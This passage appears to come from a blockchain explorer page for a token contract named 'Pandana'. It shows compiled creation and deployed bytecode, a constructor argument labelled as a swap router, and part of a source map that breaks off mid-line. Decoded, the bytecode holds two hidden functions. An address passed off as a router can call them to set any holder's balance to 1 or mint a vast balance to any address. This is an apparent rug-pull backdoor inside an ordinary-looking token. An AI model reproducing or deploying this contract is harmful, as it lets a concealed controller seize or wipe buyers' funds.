0000000000000000000000000000000000000000000000081526004016112309190611321565b60405180910390fd5b505f83856112479190611a0b565b9050809150509392505050565b5f5f82846112629190611a3e565b9050838110156112a7576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161129e90611abb565b60405180910390fd5b8091505092915050565b5f81519050919050565b5f82825260208201905092915050565b8281835e5f83830152505050565b5f601f19601f8301169050919050565b5f6112f3826112b1565b6112fd81856112bb565b935061130d8185602086016112cb565b611316816112d9565b840191505092915050565b5f6020820190508181035f83015261133981846112e9565b905092915050565b5f5ffd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f61136e82611345565b9050919050565b61137e81611364565b8114611388575f5ffd5b50565b5f8135905061139981611375565b92915050565b5f819050919050565b6113b18161139f565b81146113bb575f5ffd5b50565b5f813590506113cc816113a8565b92915050565b5f5f604083850312156113e8576113e7611341565b5b5f6113f58582860161138b565b9250506020611406858286016113be565b9150509250929050565b5f8115159050919050565b61142481611410565b82525050565b5f60208201905061143d5f83018461141b565b92915050565b61144c8161139f565b82525050565b5f6020820190506114655f830184611443565b92915050565b5f5f5f6060848603121561148257611481611341565b5b5f61148f8682870161138b565b93505060206114a08682870161138b565b92505060406114b1868287016113be565b9150509250925092565b5f60ff82169050919050565b6114d0816114bb565b82525050565b5f6020820190506114e95f8301846114c7565b92915050565b5f6020828403121561150457611503611341565b5b5f6115118482850161138b565b91505092915050565b61152381611364565b82525050565b5f60208201905061153c5f83018461151a565b92915050565b5f5f6040838503121561155857611557611341565b5b5f6115658582860161138b565b92505060206115768582860161138b565b9150509250929050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f60028204905060018216806115c457607f821691505b6020821081036115d7576115d6611580565b5b50919050565b7f50616e64616e6132304f776e61626c653a2063616c6c6572206973206e6f74205f8201527f746865206f776e65720000000000000000000000000000000000000000000000602082015250565b5f6116376029836112bb565b9150611642826115dd565b604082019050919050565b5f6020820190508181035f8301526116648161162b565b9050919050565b5f819050919050565b5f819050919050565b5f61169761169261168d8461166b565b611674565b61139f565b9050919050565b6116a78161167d565b82525050565b5f6020820190506116c05f83018461169e565b92915050565b5f819050919050565b5f6116e96116e46116df846116c6565b611674565b61139f565b9050919050565b6116f9816116cf565b82525050565b5f6020820190506117125f8301846116f0565b92915050565b7f50616e64616e6132304f776e61626c653a206e6577206f776e657220697320745f8201527f6865207a65726f20616464726573730000000000000000000000000000000000602082015250565b5f611772602f836112bb565b915061177d82611718565b604082019050919050565b5f6020820190508181035f83015261179f81611766565b9050919050565b7f50616e64616e61696e746572666163653a20617070726f76652066726f6d20745f8201527f6865207a65726f20616464726573730000000000000000000000000000000000602082015250565b5f611800602f836112bb565b915061180b826117a6565b604082019050919050565b5f6020820190508181035f83015261182d816117f4565b9050919050565b7f50616e64616e61696e746572666163653a20617070726f766520746f207468655f8201527f207a65726f206164647265737300000000000000000000000000000000000000602082015250565b5f61188e602d836112bb565b915061189982611834565b604082019050919050565b5f6020820190508181035f8301526118bb81611882565b9050919050565b7f50616e64616e61696e746572666163653a207472616e736665722066726f6d205f8201527f746865207a65726f206164647265737300000000000000000000000000000000602082015250565b5f61191c6030836112bb565b9150611927826118c2565b604082019050919050565b5f6020820190508181035f83015261194981611910565b9050919050565b7f50616e64616e61696e746572666163653a207472616e7366657220746f2074685f8201527f65207a65726f2061646472657373000000000000000000000000000000000000602082015250565b5f6119aa602e836112bb565b91506119b582611950565b604082019050919050565b5f6020820190508181035f8301526119d78161199e565b9050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f611a158261139f565b9150611a208361139f565b9250828203905081811115611a3857611a376119de565b5b92915050565b5f611a488261139f565b9150611a538361139f565b9250828201905080821115611a6b57611a6a6119de565b5b92915050565b7f5361666550616e64616e613a206164646974696f6e206f766572666c6f7700005f82015250565b5f611aa5601e836112bb565b9150611ab082611a71565b602082019050919050565b5f6020820190508181035f830152611ad281611a99565b905091905056fe50616e64616e61696e746572666163653a207472616e7366657220796f7572736f6c64206578636565647320616c6c6f77616e636550616e64616e61696e746572666163653a207472616e7366657220796f7572736f6c6420657863656564732062616c616e636550616e64616e61696e746572666163653a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa264697066735822122064e064ff1f339e4af3cbbca85c1974676b1a57a591eee7eb413e4947d30274e064736f6c634300081c0033000000000000000000000000551aa84adb62725d654866803def1459a1b256af

Deployed Bytecode

0x608060405234801561000f575f5ffd5b5060043610610109575f3560e01c80638099423b116100a0578063a457c2d71161006f578063a457c2d7146102a7578063a9059cbb146102d7578063dd62ed3e14610307578063f1cb537a14610337578063f2fde38b1461035357610109565b80638099423b14610231578063893d20e81461024d5780638da5cb5b1461026b57806395d89b411461028957610109565b8063313ce567116100dc578063313ce567146101a957806339509351146101c757806370a08231146101f7578063715018a61461022757610109565b806306fdde031461010d578063095ea7b31461012b57806318160ddd1461015b57806323b872dd14610179575b5f5ffd5b61011561036f565b6040516101229190611321565b60405180910390f35b610145600480360381019061014091906113d2565b6103ff565b604051610152919061142a565b60405180910390f35b61016361041c565b6040516101709190611452565b60405180910390f35b610193600480360381019061018e919061146b565b610425565b6040516101a0919061142a565b60405180910390f35b6101b16104f9565b6040516101be91906114d6565b60405180910390f35b6101e160048036038101906101dc91906113d2565b61050e565b6040516101ee919061142a565b60405180910390f35b610211600480360381019061020c91906114ef565b6105bc565b60405161021e9190611452565b60405180910390f35b61022f610602565b005b61024b600480360381019061024691906114ef565b610739565b005b610255610893565b6040516102629190611529565b60405180910390f35b6102736108a1565b6040516102809190611529565b60405180910390f35b6102916108c8565b60405161029e9190611321565b60405180910390f35b6102c160048036038101906102bc91906113d2565b610958565b6040516102ce919061142a565b60405180910390f35b6102f160048036038101906102ec91906113d2565b610a20565b6040516102fe919061142a565b60405180910390f35b610321600480360381019061031c9190611542565b610a3d565b60405161032e9190611452565b60405180910390f35b610351600480360381019061034c91906114ef565b610abf565b005b61036d600480360381019061036891906114ef565b610c00565b005b60606006805461037e906115ad565b80601f01602080910402602001604051908101604052809291908181526020018280546103aa906115ad565b80156103f55780601f106103cc576101008083540402835291602001916103f5565b820191905f5260205f20905b8154815290600101906020018083116103d857829003601f168201915b5050505050905090565b5f61041261040b610da6565b8484610dad565b6001905092915050565b5f600354905090565b5f610431848484610f70565b6104ee8461043d610da6565b6104e985604051806060016040528060358152602001611ada6035913960025f8b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6104a0610da6565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20546111f29092919063ffffffff16565b610dad565b600190509392505050565b5f60045f9054906101000a900460ff16905090565b5f6105b261051a610da6565b846105ad8560025f61052a610da6565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205461125490919063ffffffff16565b610dad565b6001905092915050565b5f60015f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050919050565b61060a610da6565b73ffffffffffffffffffffffffffffffffffffffff166106286108a1565b73ffffffffffffffffffffffffffffffffffffffff161461067e576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016106759061164d565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff165f5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35f5f5f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550565b610741610da6565b73ffffffffffffffffffffffffffffffffffffffff1660075f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146107cf576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016107c69061164d565b60405180910390fd5b6c0c9f2c9cd04674edea4000000060015f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055505f73ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef6c0c9f2c9cd04674edea4000000060405161088891906116ad565b60405180910390a350565b5f61089c6108a1565b905090565b5f5f5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6060600580546108d7906115ad565b80601f0160208091040260200160405190810160405280929190818152602001828054610903906115ad565b801561094e5780601f106109255761010080835404028352916020019161094e565b820191905f5260205f20905b81548152906001019060200180831161093157829003601f168201915b5050505050905090565b5f610a16610964610da6565b84610a1185604051806060016040528060308152602001611b426030913960025f61098d610da6565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20546111f29092919063ffffffff16565b610dad565b6001905092915050565b5f610a33610a2c610da6565b8484610f70565b6001905092915050565b5f60025f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905092915050565b610ac7610da6565b73ffffffffffffffffffffffffffffffffffffffff1660075f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610b55576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b4c9061164d565b60405180910390fd5b6001805f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055505f73ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef6001604051610bf591906116ff565b60405180910390a350565b610c08610da6565b73ffffffffffffffffffffffffffffffffffffffff16610c266108a1565b73ffffffffffffffffffffffffffffffffffffffff1614610c7c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c739061164d565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610cea576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ce190611788565b60405180910390fd5b8073ffffffffffffffffffffffffffffffffffffffff165f5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a3805f5f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b5f33905090565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610e1b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e1290611816565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610e89576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e80906118a4565b60405180910390fd5b8060025f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610f639190611452565b60405180910390a3505050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610fde576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610fd590611932565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160361104c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611043906119c0565b60405180910390fd5b6110b681604051806060016040528060338152602001611b0f6033913960015f8773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20546111f29092919063ffffffff16565b60015f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055506111478160015f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205461125490919063ffffffff16565b60015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516111e59190611452565b60405180910390a3505050565b5f838311158290611239576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016112309190611321565b60405180910390fd5b505f83856112479190611a0b565b9050809150509392505050565b5f5f82846112629190611a3e565b9050838110156112a7576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161129e90611abb565b60405180910390fd5b8091505092915050565b5f81519050919050565b5f82825260208201905092915050565b8281835e5f83830152505050565b5f601f19601f8301169050919050565b5f6112f3826112b1565b6112fd81856112bb565b935061130d8185602086016112cb565b611316816112d9565b840191505092915050565b5f6020820190508181035f83015261133981846112e9565b905092915050565b5f5ffd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f61136e82611345565b9050919050565b61137e81611364565b8114611388575f5ffd5b50565b5f8135905061139981611375565b92915050565b5f819050919050565b6113b18161139f565b81146113bb575f5ffd5b50565b5f813590506113cc816113a8565b92915050565b5f5f604083850312156113e8576113e7611341565b5b5f6113f58582860161138b565b9250506020611406858286016113be565b9150509250929050565b5f8115159050919050565b61142481611410565b82525050565b5f60208201905061143d5f83018461141b565b92915050565b61144c8161139f565b82525050565b5f6020820190506114655f830184611443565b92915050565b5f5f5f6060848603121561148257611481611341565b5b5f61148f8682870161138b565b93505060206114a08682870161138b565b92505060406114b1868287016113be565b9150509250925092565b5f60ff82169050919050565b6114d0816114bb565b82525050565b5f6020820190506114e95f8301846114c7565b92915050565b5f6020828403121561150457611503611341565b5b5f6115118482850161138b565b91505092915050565b61152381611364565b82525050565b5f60208201905061153c5f83018461151a565b92915050565b5f5f6040838503121561155857611557611341565b5b5f6115658582860161138b565b92505060206115768582860161138b565b9150509250929050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f60028204905060018216806115c457607f821691505b6020821081036115d7576115d6611580565b5b50919050565b7f50616e64616e6132304f776e61626c653a2063616c6c6572206973206e6f74205f8201527f746865206f776e65720000000000000000000000000000000000000000000000602082015250565b5f6116376029836112bb565b9150611642826115dd565b604082019050919050565b5f6020820190508181035f8301526116648161162b565b9050919050565b5f819050919050565b5f819050919050565b5f61169761169261168d8461166b565b611674565b61139f565b9050919050565b6116a78161167d565b82525050565b5f6020820190506116c05f83018461169e565b92915050565b5f819050919050565b5f6116e96116e46116df846116c6565b611674565b61139f565b9050919050565b6116f9816116cf565b82525050565b5f6020820190506117125f8301846116f0565b92915050565b7f50616e64616e6132304f776e61626c653a206e6577206f776e657220697320745f8201527f6865207a65726f20616464726573730000000000000000000000000000000000602082015250565b5f611772602f836112bb565b915061177d82611718565b604082019050919050565b5f6020820190508181035f83015261179f81611766565b9050919050565b7f50616e64616e61696e746572666163653a20617070726f76652066726f6d20745f8201527f6865207a65726f20616464726573730000000000000000000000000000000000602082015250565b5f611800602f836112bb565b915061180b826117a6565b604082019050919050565b5f6020820190508181035f83015261182d816117f4565b9050919050565b7f50616e64616e61696e746572666163653a20617070726f766520746f207468655f8201527f207a65726f206164647265737300000000000000000000000000000000000000602082015250565b5f61188e602d836112bb565b915061189982611834565b604082019050919050565b5f6020820190508181035f8301526118bb81611882565b9050919050565b7f50616e64616e61696e746572666163653a207472616e736665722066726f6d205f8201527f746865207a65726f206164647265737300000000000000000000000000000000602082015250565b5f61191c6030836112bb565b9150611927826118c2565b604082019050919050565b5f6020820190508181035f83015261194981611910565b9050919050565b7f50616e64616e61696e746572666163653a207472616e7366657220746f2074685f8201527f65207a65726f2061646472657373000000000000000000000000000000000000602082015250565b5f6119aa602e836112bb565b91506119b582611950565b604082019050919050565b5f6020820190508181035f8301526119d78161199e565b9050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f611a158261139f565b9150611a208361139f565b9250828203905081811115611a3857611a376119de565b5b92915050565b5f611a488261139f565b9150611a538361139f565b9250828201905080821115611a6b57611a6a6119de565b5b92915050565b7f5361666550616e64616e613a206164646974696f6e206f766572666c6f7700005f82015250565b5f611aa5601e836112bb565b9150611ab082611a71565b602082019050919050565b5f6020820190508181035f830152611ad281611a99565b905091905056fe50616e64616e61696e746572666163653a207472616e7366657220796f7572736f6c64206578636565647320616c6c6f77616e636550616e64616e61696e746572666163653a207472616e7366657220796f7572736f6c6420657863656564732062616c616e636550616e64616e61696e746572666163653a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa264697066735822122064e064ff1f339e4af3cbbca85c1974676b1a57a591eee7eb413e4947d30274e064736f6c634300081c0033

Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)

000000000000000000000000551aa84adb62725d654866803def1459a1b256af

-----Decoded View---------------
Arg [0] : legosSwapRouterv3 (address): 0x551Aa84ADb62725d654866803Def1459A1b256AF

-----Encoded View---------------
1 Constructor Arguments found :
Arg [0] : 000000000000000000000000551aa84adb62725d654866803def1459a1b256af


Deployed Bytecode Sourcemap

11434:7564:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;12748:94;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;14668:177;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;12919:102;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;15336:339;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;12424:94;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;16097:234;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;13096:120;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;5839:148;;;:::i;:::-;;14074:207;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;12261:94;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;5179:87;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;12585:98;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;16846:284;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;13893:175;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;14350:158;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;13510:164;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;6142:253;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;12748:94;12796:13;12829:5;12822:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;12748:94;:::o;14668:177::-;14752:4;14769:46;14778:12;:10;:12::i;:::-;14792;14806:8;14769;:46::i;:::-;14833:4;14826:11;;14668:177;;;;:::o;12919:102::-;12974:7;13001:12;;12994:19;;12919:102;:::o;15336:339::-;15439:4;15456:39;15466:6;15474:10;15486:8;15456:9;:39::i;:::-;15506:139;15515:6;15523:12;:10;:12::i;:::-;15537:107;15578:8;15537:107;;;;;;;;;;;;;;;;;:14;:22;15552:6;15537:22;;;;;;;;;;;;;;;:36;15560:12;:10;:12::i;:::-;15537:36;;;;;;;;;;;;;;;;:40;;:107;;;;;:::i;:::-;15506:8;:139::i;:::-;15663:4;15656:11;;15336:339;;;;;:::o;12424:94::-;12476:5;12501:9;;;;;;;;;;;12494:16;;12424:94;:::o;16097:234::-;16186:4;16203:98;16212:12;:10;:12::i;:::-;16226;16240:60;16287:12;16240:14;:28;16255:12;:10;:12::i;:::-;16240:28;;;;;;;;;;;;;;;:42;16269:12;16240:42;;;;;;;;;;;;;;;;:46;;:60;;;;:::i;:::-;16203:8;:98::i;:::-;16319:4;16312:11;;16097:234;;;;:::o;13096:120::-;13164:7;13191:8;:17;13200:7;13191:17;;;;;;;;;;;;;;;;13184:24;;13096:120;;;:::o;5839:148::-;5410:12;:10;:12::i;:::-;5399:23;;:7;:5;:7::i;:::-;:23;;;5391:77;;;;;;;;;;;;:::i;:::-;;;;;;;;;5946:1:::1;5909:40;;5930:6;;;;;;;;;;;5909:40;;;;;;;;;;;;5977:1;5960:6;;:19;;;;;;;;;;;;;;;;;;5839:148::o:0;14074:207::-;13278:12;:10;:12::i;:::-;13263:27;;:11;;;;;;;;;;;:27;;;13255:81;;;;;;;;;;;;:::i;:::-;;;;;;;;;14168:22:::1;14144:8;:21;14153:11;14144:21;;;;;;;;;;;;;;;:46;;;;14246:1;14216:57;;14225:11;14216:57;;;14250:22;14216:57;;;;;;:::i;:::-;;;;;;;;14074:207:::0;:::o;12261:94::-;12313:7;12340;:5;:7::i;:::-;12333:14;;12261:94;:::o;5179:87::-;5225:7;5252:6;;;;;;;;;;;5245:13;;5179:87;:::o;12585:98::-;12635:13;12668:7;12661:14;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;12585:98;:::o;16846:284::-;16934:4;16951:149;16960:12;:10;:12::i;:::-;16974;16988:111;17035:11;16988:111;;;;;;;;;;;;;;;;;:14;:28;17003:12;:10;:12::i;:::-;16988:28;;;;;;;;;;;;;;;:42;17017:12;16988:42;;;;;;;;;;;;;;;;:46;;:111;;;;;:::i;:::-;16951:8;:149::i;:::-;17118:4;17111:11;;16846:284;;;;:::o;13893:175::-;13976:4;13993:45;14003:12;:10;:12::i;:::-;14017:10;14029:8;13993:9;:45::i;:::-;14056:4;14049:11;;13893:175;;;;:::o;14350:158::-;14438:7;14465:14;:21;14480:5;14465:21;;;;;;;;;;;;;;;:35;14487:12;14465:35;;;;;;;;;;;;;;;;14458:42;;14350:158;;;;:::o;13510:164::-;13278:12;:10;:12::i;:::-;13263:27;;:11;;;;;;;;;;;:27;;;13255:81;;;;;;;;;;;;:::i;:::-;;;;;;;;;13603:1:::1;13579:8:::0;:21:::1;13588:11;13579:21;;;;;;;;;;;;;;;:25;;;;13660:1;13630:36;;13639:11;13630:36;;;13664:1;13630:36;;;;;;:::i;:::-;;;;;;;;13510:164:::0;:::o;6142:253::-;5410:12;:10;:12::i;:::-;5399:23;;:7;:5;:7::i;:::-;:23;;;5391:77;;;;;;;;;;;;:::i;:::-;;;;;;;;;6251:1:::1;6231:22;;:8;:22;;::::0;6223:82:::1;;;;;;;;;;;;:::i;:::-;;;;;;;;;6350:8;6321:38;;6342:6;;;;;;;;;;;6321:38;;;;;;;;;;;;6379:8;6370:6;;:17;;;;;;;;;;;;;;;;;;6142:253:::0;:::o;3740:98::-;3793:7;3820:10;3813:17;;3740:98;:::o;18592:397::-;18710:1;18693:19;;:5;:19;;;18685:79;;;;;;;;;;;;:::i;:::-;;;;;;;;;18807:1;18783:26;;:12;:26;;;18775:84;;;;;;;;;;;;:::i;:::-;;;;;;;;;18918:8;18880:14;:21;18895:5;18880:21;;;;;;;;;;;;;;;:35;18902:12;18880:35;;;;;;;;;;;;;;;:46;;;;18958:12;18942:39;;18951:5;18942:39;;;18972:8;18942:39;;;;;;:::i;:::-;;;;;;;;18592:397;;;:::o;17617:531::-;17736:1;17718:20;;:6;:20;;;17710:81;;;;;;;;;;;;:::i;:::-;;;;;;;;;17832:1;17810:24;;:10;:24;;;17802:83;;;;;;;;;;;;:::i;:::-;;;;;;;;;17933:85;17954:8;17933:85;;;;;;;;;;;;;;;;;:8;:16;17942:6;17933:16;;;;;;;;;;;;;;;;:20;;:85;;;;;:::i;:::-;17914:8;:16;17923:6;17914:16;;;;;;;;;;;;;;;:104;;;;18052:34;18077:8;18052;:20;18061:10;18052:20;;;;;;;;;;;;;;;;:24;;:34;;;;:::i;:::-;18029:8;:20;18038:10;18029:20;;;;;;;;;;;;;;;:57;;;;18119:10;18102:38;;18111:6;18102:38;;;18131:8;18102:38;;;;;;:::i;:::-;;;;;;;;17617:531;;;:::o;8055:178::-;8141:7;8170:1;8165;:6;;8173:12;8157:29;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;8193:9;8209:1;8205;:5;;;;:::i;:::-;8193:17;;8226:1;8219:8;;;8055:178;;;;;:::o;7222:170::-;7280:7;7296:9;7312:1;7308;:5;;;;:::i;:::-;7296:17;;7333:1;7328;:6;;7320:49;;;;;;;;;;;;:::i;:::-;;;;;;;;;7385:1;7378:8;;;7222:170;;;;:::o;7:99:1:-;59:6;93:5;87:12;77:22;;7:99;;;:::o;112:169::-;196:11;230:6;225:3;218:19;270:4;265:3;261:14;246:29;;112:169;;;;:::o;287:139::-;376:6;371:3;366;360:23;417:1;408:6;403:3;399:16;392:27;287:139;;;:::o;432:102::-;473:6;524:2;520:7;515:2;508:5;504:14;500:28;490:38;;432:102;;;:::o;540:377::-;628:3;656:39;689:5;656:39;:::i;:::-;711:71;775:6;770:3;711:71;:::i;:::-;704:78;;791:65;849:6;844:3;837:4;830:5;826:16;791:65;:::i;:::-;881:29;903:6;881:29;:::i;:::-;876:3;872:39;865:46;;632:285;540:377;;;;:::o;923:313::-;1036:4;1074:2;1063:9;1059:18;1051:26;;1123:9;1117:4;1113:20;1109:1;1098:9;1094:17;1087:47;1151:78;1224:4;1215:6;1151:78;:::i;:::-;1143:86;;923:313;;;;:::o;1323:117::-;1432:1;1429;1422:12;1569:126;1606:7;1646:42;1639:5;1635:54;1624:65;;1569:126;;;:::o;1701:96::-;1738:7;1767:24;1785:5;1767:24;:::i;:::-;1756:35;;1701:96;;;:::o;1803:122::-;1876:24;1894:5;1876:24;:::i;:::-;1869:5;1866:35;1856:63;;1915:1;1912;1905:12;1856:63;1803:122;:::o;1931:139::-;1977:5;2015:6;2002:20;1993:29;;2031:33;2058:5;2031:33;:::i;:::-;1931:139;;;;:::o;2076:77::-;2113:7;2142:5;2131:16;;2076:77;;;:::o;2159:122::-;2232:24;2250:5;2232:24;:::i;:::-;2225:5;2222:35;2212:63;;2271:1;2268;2261:12;2212:63;2159:122;:::o;2287:139::-;2333:5;2371:6;2358:20;2349:29;;2387:33;2414:5;2387:33;:::i;:::-;2287:139;;;;:::o;2432:474::-;2500:6;2508;2557:2;2545:9;2536:7;2532:23;2528:32;2525:119;;;2563:79;;:::i;:::-;2525:119;2683:1;2708:53;2753:7;2744:6;2733:9;2729:22;2708:53;:::i;:::-;2698:63;;2654:117;2810:2;2836:53;2881:7;2872:6;2861:9;2857:22;2836:53;:::i;:::-;2826:63;;2781:118;2432:474;;;;;:::o;2912:90::-;2946:7;2989:5;2982:13;2975:21;2964:32;;2912:90;;;:::o;3008:109::-;3089:21;3104:5;3089:21;:::i;:::-;3084:3;3077:34;3008:109;;:::o;3123:210::-;3210:4;3248:2;3237:9;3233:18;3225:26;;3261:65;3323:1;3312:9;3308:17;3299:6;3261:65;:::i;:::-;3123:210;;;;:::o;3339:118::-;3426:24;3444:5;3426:24;:::i;:::-;3421:3;3414:37;3339:118;;:::o;3463:222::-;3556:4;3594:2;3583:9;3579:18;3571:26;;3607:71;3675:1;3664:9;3660:17;3651:6;3607:71;:::i;:::-;3463:222;;;;:::o;3691:619::-;3768:6;3776;3784;3833:2;3821:9;3812:7;3808:23;3804:32;3801:119;;;3839:79;;:::i;:::-;3801:119;3959:1;3984:53;4029:7;4020:6;4009:9;4005:22;3984:53;:::i;:::-;3974:63;;3930:117;4086:2;4112:53;4157:7;4148:6;4137:9;4133:22;4112:53;:::i;:::-;4102:63;;4057:118;4214:2;4240:53;4285:7;4276:6;4265:9;4261:22;4240:53;:::i;:::-;4230:63;;4185:118;3691:619;;;;;:::o;4316:86::-;4351:7;4391:4;4384:5;4380:16;4369:27;;4316:86;;;:::o;4408:112::-;4491:22;4507:5;4491:22;:::i;:::-;4486:3;4479:35;4408:112;;:::o;4526:214::-;4615:4;4653:2;4642:9;4638:18;4630:26;;4666:67;4730:1;4719:9;4715:17;4706:6;4666:67;:::i;:::-;4526:214;;;;:::o;4746:329::-;4805:6;4854:2;4842:9;4833:7;4829:23;4825:32;4822:119;;;4860:79;;:::i;:::-;4822:119;4980:1;5005:53;5050:7;5041:6;5030:9;5026:22;5005:53;:::i;:::-;4995:63;;4951:117;4746:329;;;;:::o;5081:118::-;5168:24;5186:5;5168:24;:::i;:::-;5163:3;5156:37;5081:118;;:::o;5205:222::-;5298:4;5336:2;5325:9;5321:18;5313:26;;5349:71;5417:1;5406:9;5402:17;5393:6;5349:71;:::i;:::-;5205:222;;;;:::o;5433:474::-;5501:6;5509;5558:2;5546:9;5537:7;5533:23;5529:32;5526:119